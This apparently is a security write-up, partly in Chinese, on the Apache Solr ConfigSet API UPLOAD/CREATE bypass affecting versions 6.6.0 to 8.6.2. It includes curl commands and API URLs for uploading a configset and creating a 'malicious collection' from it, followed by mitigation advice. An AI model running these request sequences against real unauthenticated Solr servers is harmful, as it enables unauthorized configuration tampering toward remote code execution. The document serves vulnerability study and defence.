Impact version
- 6.6.0 to 6.6.5
- 7.0.0 to 7.7.3
- 8.0.0 to 8.6.2
Vulnerability description
Solr originally prohibited some dangerous operations that may cause RCE to upload configuration through the ConfigSet API. But this restriction can be bypassed by combining the two ACTIONs of UPLOAD/CREATE.
original
Solr prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that’s uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.
Exploit conditions
- Solr API does not have authentication
- SolrCloud mode starts (because Standalone mode does not have the function of Configset API)
Upload a Configset
The upload function is enabled by default, unless the JVM parameters are specified:
-Dconfigset.upload.enabled=false
Vulnerability description/principle:
The normal configset uploaded via UPLOAD cannot be used to create a collection: If you try to create it, this error will occur
The configset for this collection was uploaded without any authentication in place, and use of <lib> is not available for collections with untrusted configsets. To use this component, re-upload the configset after enabling authentication and authorization.
And when we UPLOAD first, and then create a collection based on this configset, we can bypass this restriction:
The effect achieved is that you can customize the configset, and then create a malicious collection based on this. I have not thought of how to make good use of this custom configuration to achieve RCE. Just know to use the previous template injection, but that has version restrictions, right?
step:
1、【UPLOAD】准备恶意配置,打包,上传
# 先将配置打包成zip
(cd solr/server/solr/configsets/sample_techproducts_configs/conf && zip -r - *) > db-configset.zip
# 再通过上传API将zip上传
curl -X POST --header "Content-Type:application/octet-stream" --data-binary @db-configset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=db-configset"
2、【CREATE】根据UPLOAD的配置,创建一个新的配置,绕过不能通过直接UPLOAD创建collection的限制
/solr/admin/configs?action=CREATE&name=db-configset1&baseConfigSet=db-configset&configSetProp.immutable=false&wt=xml&omitHeader=true
3、【LIST】查看Configsets的配置,确保已生成了新的configset
/solr/admin/configs?action=LIST&omitHeader=true
4、根据CREATE得到的configset创建恶意collection
/solr/admin/collections?action=CREATE&numShards=1&name=coll_test1&collection.configName=db-configset1
5、利用之前的漏洞进行利用?
Repair recommendations/ mitigation measures
- Disable the UPLOAD command, ie
-Dconfigset.upload.enabled=false; - Certify
- Upgrade to 8.6.3 and above
- If you cannot upgrade, try this patch: SOLR-14663
- Set up firewall rules for access control, and set up a whitelist for Solr API access
reference
- https://seclists.org/oss-sec/2020/q4/47
- ConfigSets CREATE does not set trusted flag
- https://issues.apache.org/jira/browse/SOLR-14925
Note
Reference:
http://mail-archives.apache.org/mod_mbox/lucene-solr-user/201807.mbox/%3CCAPCX2-+jojXrWvPSPiBR_xwphdpk+yPM2HYLojX2rqRTKMGm9g@mail.gmail.com%3E
Solr can run in two modes: "Cloud" mode or "Standalone" mode.
In SolrCloud mode, you can create collections, but in Standalone mode, you can only create cores.
In Standalone mode, 400 will appear,
close and restart SolrCloud mode:
this time it succeeded:
appendix
Upload Configsets
# 先将配置打包成zip
(cd solr/server/solr/configsets/sample_techproducts_configs/conf && zip -r - *) > myconfigset.zip
# 再通过上传API将zip上传
curl -X POST --header "Content-Type:application/octet-stream" --data-binary @myconfigset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=myConfigSet"
Create Configsets
Create a new configset based on the previously uploaded Configsets
- name: the name of this new configset
- baseConfigSet: Based on which uploaded Configsets
- configSetProp.immutable: Set this to false
http://cqq.com:8983/solr/admin/configs?action=CREATE&name=myConfigSet1&baseConfigSet=myConfigSet&configSetProp.immutable=false&wt=xml&omitHeader=true
View Configsets:
http://cqq.com:8983/solr/admin/configs?action=LIST&omitHeader=true
The uploaded and configured Configsets are not in the file system, but in Zookeeper.
The Configsets API enables you to upload new configsets to ZooKeeper, create, and delete configsets when Solr is running SolrCloud mode.
This API provides a way to upload configuration files to ZooKeeper and share the same set of configuration files between two or more collections.